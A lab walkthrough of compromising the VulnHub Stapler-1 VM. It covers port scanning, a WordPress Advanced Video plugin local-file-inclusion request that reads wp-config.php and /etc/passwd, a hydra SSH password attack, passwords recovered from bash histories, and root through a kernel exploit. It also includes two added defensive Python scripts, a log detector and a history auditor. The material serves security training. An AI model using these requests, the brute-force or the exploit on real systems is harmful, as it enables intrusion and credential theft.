VulnHub Lab Series 11: Stapler-1


    Target VM: Stapler-1 ~ VulnHub
    Difficulty: 3.0 / 10.0

    This post briefly records each stage of compromising the target VM. Not every step is described in full detail, and some of it may be wrong; readers are welcome to point out mistakes. Thank you!

    Summary: after the port scan, ports 21, 22 and 80 yield some hints and a username. Port 12380 is then visited, and nikto turns up several directories; one of them, /blogblog, is a WordPress site. The plugins installed under wp-content are listed, and advanced-video-embed has a file inclusion vulnerability, which is used to read /etc/passwd and the MySQL credentials in wp-config.php. With the usernames and password in hand, hydra finds a valid account and gives a low-privilege shell. From there, root is reached either through a kernel exploit or by following the hints to peter's password, logging in as peter and using sudo directly.

    To be improved: file-processing commands (cut, awk, etc.) and writing bash scripts to automate running a fixed set of commands

    Host discovery & port scanning

    Target IP: 192.168.1.10

    Port scan results:

    hh@Kali2020:~$ sudo nmap -sS -T5 -p- --open 192.168.1.10
    Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 11:46 CST
    Nmap scan report for red.initech (192.168.1.10)
    Host is up (0.00019s latency).
    Not shown: 65523 filtered ports, 4 closed ports
    Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
    PORT      STATE SERVICE
    21/tcp    open  ftp
    22/tcp    open  ssh
    53/tcp    open  domain
    80/tcp    open  http
    139/tcp   open  netbios-ssn
    666/tcp   open  doom
    3306/tcp  open  mysql
    12380/tcp open  unknown
    MAC Address: 00:0C:29:77:E0:EA (VMware)
    Nmap done: 1 IP address (1 host up) scanned in 54.08 seconds
    

    Information gathering

    Port 80

    Nothing useful here; gather information from the other ports

    Port 22

    No password, but it yields the username Barry

    Port 12380

    1. It shows as unknown, so rescan it in detail
    hhh@Kali2020:~$ sudo nmap -A -p 12380 -sV -sS 192.168.1.10
    Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 13:23 CST
    Nmap scan report for red.initech (192.168.1.10)
    Host is up (0.00023s latency).
    
    PORT      STATE SERVICE VERSION
    12380/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Tim, we need to-do better next year for Initech
    MAC Address: 00:0C:29:77:E0:EA (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
    Network Distance: 1 hop
    
    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.23 ms red.initech (192.168.1.10)
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 14.16 seconds
    
    

    The service is Apache httpd 2.4.18 ((Ubuntu)), and it opens in the browser

    2. Scan with nikto: the site uses SSL, and three directories turn up
    hhh@Kali2020:~$ nikto -h 192.168.1.10:12380
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          192.168.1.10
    + Target Hostname:    192.168.1.10
    + Target Port:        12380
    ---------------------------------------------------------------------------
    + SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                       Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                       Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
    + Start Time:         2021-02-03 13:02:03 (GMT8)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.18 (Ubuntu)
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
    + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
    + The site uses SSL and Expect-CT header is not present.
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    + Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    + "robots.txt" contains 2 entries which should be manually viewed.
    + Hostname '192.168.1.10' does not match certificate's names: Red.Initech
    + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
    + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
    + Uncommon header 'x-ob_mode' found, with contents: 1
    + OSVDB-3233: /icons/README: Apache default file found.
    + /phpmyadmin/: phpMyAdmin directory found
    + 8071 requests: 0 error(s) and 15 item(s) reported on remote host
    + End Time:           2021-02-03 13:04:00 (GMT8) (117 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    
    3. Visit the three directories
    https://192.168.1.10:12380/admin112233
    Shows a hint:
    This could of been a BeEF-XSS hook ;)
    
    https://192.168.1.10:12380/blogblog
    A blog
    
    https://192.168.1.10:12380/phpmyadmin
    A login page
    
    4. Start from /blogblog and scan it with dirb; it is a WordPress site
    hhh@Kali2020:~$ dirb https://192.168.1.10:12380/blogblog
    
    ---- Scanning URL: https://192.168.1.10:12380/blogblog/ ----
    + https://192.168.1.10:12380/blogblog/index.php (CODE:301|SIZE:0)
    ==> DIRECTORY: https://192.168.1.10:12380/blogblog/wp-admin/
    ==> DIRECTORY: https://192.168.1.10:12380/blogblog/wp-content/
    ==> DIRECTORY: https://192.168.1.10:12380/blogblog/wp-includes/
    

    Gaining access

    Route one: plugin vulnerability

    1. First go into the directory and view the plugin list; each plugin has a readme.md file showing its version
    https://192.168.1.10:12380/blogblog/wp-content/plugins/
    
    2. For the advanced-video-embed plugin, google its vulnerabilities
      WordPress Plugin Advanced Video 1.0 - Local File Inclusion
      It is a local file inclusion vulnerability; proceed according to the advisory's instructions
    3. Read the wp-config configuration file
    https://192.168.1.10:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
    

    After visiting it, the page shows a URL; following it leads to a .jpeg file, and downloading that file reveals the contents of wp-config.php

    wget --no-check-certificate  https://192.168.1.10:12380/blogblog/wp-content/uploads/974197914.jpeg
    

    --no-check-certificate: skip certificate verification, needed for files on HTTPS sites

    The database root password is visible: root : plbkac

    hhh@Kali2020:~$ cat 974197914.jpeg 
    // ** MySQL settings - You can get this info from your web host ** //
    /** The name of the database for WordPress */
    define('DB_NAME', 'wordpress');
    /** MySQL database username */
    define('DB_USER', 'root');
    /** MySQL database password */
    define('DB_PASSWORD', 'plbkac');
    /** MySQL hostname */
    define('DB_HOST', 'localhost');
    /** Database Charset to use in creating database tables. */
    define('DB_CHARSET', 'utf8mb4');
    
    4. Read /etc/passwd the same way as the previous step to view its contents
    https://192.168.1.10:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=/etc/passwd
    

    Part of the passwd file:

    CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
    JKanode:x:1013:1013::/home/JKanode:/bin/bash
    CJoo:x:1014:1014::/home/CJoo:/bin/bash
    Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
    LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
    JLipps:x:1017:1017::/home/JLipps:/bin/sh
    jamie:x:1018:1018::/home/jamie:/bin/sh
    Sam:x:1019:1019::/home/Sam:/bin/zsh
    Drew:x:1020:1020::/home/Drew:/bin/bash
    jess:x:1021:1021::/home/jess:/bin/bash
    SHAY:x:1022:1022::/home/SHAY:/bin/bash
    Taylor:x:1023:1023::/home/Taylor:/bin/sh
    mel:x:1024:1024::/home/mel:/bin/bash
    kai:x:1025:1025::/home/kai:/bin/sh
    zoe:x:1026:1026::/home/zoe:/bin/bash
    NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
    www:x:1028:1028::/home/www:
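
Detection for the two file-read requests above (wp-config.php and /etc/passwd) from the web server's side, as an added example that is not part of the original write-up. It assumes Apache "combined" access-log format; the log lines and the client IP 192.168.1.20 are constructed.

```python
"""Flag requests that abuse the Advanced Video Embed 'thumb' parameter
(action=ave_publishPost) to read arbitrary files. Added example for this
write-up, not from the original post; log lines and client IP are constructed."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache 'combined' access log: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def classify_request(path: str):
    """Return the decoded thumb value if the request matches the LFI pattern, else None."""
    parts = urlsplit(path)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("action", [""])[0] != "ave_publishPost":
        return None
    # parse_qs decoded once; decode again to catch %252e%252e-style double encoding
    thumb = unquote(qs.get("thumb", [""])[0])
    if ".." in thumb or thumb.startswith("/"):
        return thumb
    return None

def scan_access_log(lines):
    """One finding per LFI-shaped request; status is kept so 200s can be triaged first."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        thumb = classify_request(m["path"])
        if thumb is not None:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "status": int(m["status"]), "thumb": thumb})
    return findings

# Constructed sample lines shaped like the requests in this write-up (IP is made up).
SAMPLE_LOG = [
    '192.168.1.20 - - [03/Feb/2021:13:40:01 +0800] "GET /blogblog/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.168.1.20 - - [03/Feb/2021:13:45:10 +0800] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.168.1.20 - - [03/Feb/2021:13:47:22 +0800] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=%252Fetc%252Fpasswd HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.168.1.20 - - [03/Feb/2021:13:48:00 +0800] "POST /blogblog/wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} thumb={f['thumb']}")
```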
    
    5. Extract the useful information from /etc/passwd
      Reference: the Linux cut command
    cat 1097971703.jpeg | grep /bin/bash | cut -d ":" -f1 > user.txt
    

    -d: custom delimiter, here the colon
    -f1: select the first field

    6. Brute-force the account credentials with hydra
    hydra 192.168.1.10 ssh -L user.txt -p plbkac
    

    hydra finds a valid account: zoe with password plbkac

    7. Log in over SSH
    ssh zoe@192.168.1.10
    

    Privilege escalation

    Method one: switch to the peter user

    Walking through the files under /home, the peter folder stands out

    zoe@red:/home$ ls -alhR
    

    peter's folder:

    ./peter:
    total 72K
    drwxr-xr-x  3 peter peter 4.0K Jun  3  2016 .
    drwxr-xr-x 32 root  root  4.0K Jun  4  2016 ..
    -rw-------  1 peter peter    1 Jun  5  2016 .bash_history
    -rw-r--r--  1 peter peter  220 Jun  3  2016 .bash_logout
    -rw-r--r--  1 peter peter 3.7K Jun  3  2016 .bashrc
    drwx------  2 peter peter 4.0K Jun  6  2016 .cache
    -rw-r--r--  1 peter peter  675 Jun  3  2016 .profile
    -rw-r--r--  1 peter peter    0 Jun  3  2016 .sudo_as_admin_successful
    -rw-------  1 peter peter  577 Jun  3  2016 .viminfo
    -rw-rw-r--  1 peter peter  39K Jun  3  2016 .zcompdump
    ls: cannot open directory './peter/.cache': Permission denied
    

    Following this hint, next try to log in as peter

    Checking each user's .bash_history: in bash, first write all the directory names into an array, then run the loop on the next line, which iterates 30 times and each time executes cd, pwd, cat and cd. JKanode's .bash_history differs from the others, and from it peter's password is read as JZQuyIN5

    zoe@red:/home$ array=(AParnell Drew elly jamie JKanode LSolum mel peter SHAY Taylor CCeaser DSwanger ETollefson JBare JLipps LSolum2 MFrei RNunemaker SHayslett www CJoo Eeth IChadwick jess kai MBassin NATHAN Sam SStroud zoe)
    zoe@red:/home$ for i in {0..29}; do cd ./${array[$i]}; pwd; cat .bash_history; cd ../; done
    

    Partial output:

    /home/AParnell
    exit
    /home/Drew
    exit
    /home/elly
    exit
    /home/jamie
    top
    ps aux
    exit
    /home/JKanode
    id
    whoami
    ls -lah
    pwd
    ps aux
    sshpass -p thisimypassword ssh JKanode@localhost
    apt-get install sshpass
    sshpass -p JZQuyIN5 peter@localhost
    ps -ef
    top
    kill -9 3747
    exit
    /home/LSolum
    exit
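
The same sweep written as a defender's audit, as an added example that is not part of the original write-up: it reports which user's history carries a password on the command line (the sshpass -p pattern that leaked peter's password above) while redacting the secret itself. The history texts and passwords below are constructed; on a real host each readable /home/*/.bash_history would be fed in instead.

```python
"""Audit shell histories for passwords passed on the command line.
Added example for this write-up, not from the original post.
Works on constructed in-memory history text so it runs offline."""
import re

# tool -> regex whose 'secret' group is the password token on the command line
SECRET_PATTERNS = {
    "sshpass": re.compile(r"\bsshpass\s+-p\s*(?P<secret>\S+)"),
    "mysql":   re.compile(r"\bmysql\b.*?\s(?:-p|--password=)(?P<secret>\S+)"),
    "curl":    re.compile(r"\bcurl\b.*?\s-u\s*\S+?:(?P<secret>\S+)"),
}

def audit_history(user: str, history: str):
    """Return findings for one user's history; the secret is redacted, never stored."""
    findings = []
    for lineno, cmd in enumerate(history.splitlines(), start=1):
        for tool, pat in SECRET_PATTERNS.items():
            m = pat.search(cmd)
            if m:
                redacted = cmd[:m.start("secret")] + "<redacted>" + cmd[m.end("secret"):]
                findings.append({"user": user, "line": lineno, "tool": tool,
                                 "command": redacted})
                break
    return findings

def audit_all(histories: dict):
    """Audit a mapping of username -> history text, preserving user order."""
    return [f for user, text in histories.items() for f in audit_history(user, text)]

# Constructed sample histories shaped like the ones walked above; passwords are made up.
SAMPLE_HISTORIES = {
    "AParnell": "exit\n",
    "jamie": "top\nps aux\nexit\n",
    "JKanode": "id\nwhoami\nsshpass -p ExamplePw1 ssh JKanode@localhost\n"
               "apt-get install sshpass\nsshpass -p ExamplePw2 peter@localhost\nexit\n",
    "zoe": "mysql -u root -pExamplePw3 wordpress\nexit\n",
}

if __name__ == "__main__":
    for f in audit_all(SAMPLE_HISTORIES):
        print(f"{f['user']}:{f['line']} [{f['tool']}] {f['command']}")
```

A `mysql -u root -p wordpress` that prompts for the password is deliberately not reported; only a secret actually present in the history counts.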
    

    Log in as peter

    su peter
    sudo cat /root/flag.txt
    

    Method two: privilege escalation through a system vulnerability

    Check the target's details: Ubuntu 16.04 | Linux kernel 4.4.0

    root@red:~# lsb_release -a
    No LSB modules are available.
    Distributor ID: Ubuntu
    Description:    Ubuntu 16.04 LTS
    Release:        16.04
    Codename:       xenial
    root@red:~# uname -a
    Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
    

    You can google for related vulnerabilities, or use the les.sh tool to enumerate likely ones

    Here exploit-db was searched for Linux Kernel 4.4 Ubuntu 16.04, and the following exploit was chosen

    Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation

    Following its instructions, first transfer the files to the target via a simple Python HTTP server (serving files to a target with a simple Python HTTP server was shown in several earlier VMs)

    Make the files executable, run compile.sh, then run ./doubleput; root is obtained

    zoe@red:~$ ./compile.sh 
    
    zoe@red:~$ ./doubleput 
    starting writev
    woohoo, got pointer reuse
    writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
    suid file detected, launching rootshell...
    we have root privs now...
    root@red:~# id
    uid=0(root) gid=0(root) groups=0(root),1026(zoe)
    

    Summary

    1. SSL
    2. WordPress plugin vulnerabilities
    3. String manipulation | awk | cut
    4. ls -R
    5. Writing bash scripts to automate searching

    Original post: https://www.cnblogs.com/labster/p/14377517.html